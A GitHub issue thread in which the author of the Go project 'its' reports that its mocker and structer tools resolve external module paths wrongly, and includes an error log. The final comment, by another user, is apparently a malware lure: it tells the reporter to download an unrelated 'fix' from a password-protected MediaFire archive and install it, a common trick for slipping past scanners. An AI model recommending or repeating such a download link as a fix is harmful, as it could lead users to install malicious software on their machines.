### ISSUE TITLE
mocker and structer do not work for external modules

### ISSUE THREAD

**Issue by youta-t** [youta-t/its#54]
Fails to generate mocks.

**Comment by youta-t** [comment]
On trying to generate mock for `github.com/aws/aws-sdk-go-v2/service/ec2` , structer searching wrong package path.

```
[Info  - 13:35:45] 2024/08/27 13:35:45 2024/08/27 13:35:45 cannot find package "<WORK DIRECTORY>/its/external/github.com/aws/aws-sdk-go-v2/service/ec2" in:
	${HOME}/sdk/go1.22.x/src/Users/youta/devel/its/external/github.com/aws/aws-sdk-go-v2/service/ec2
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
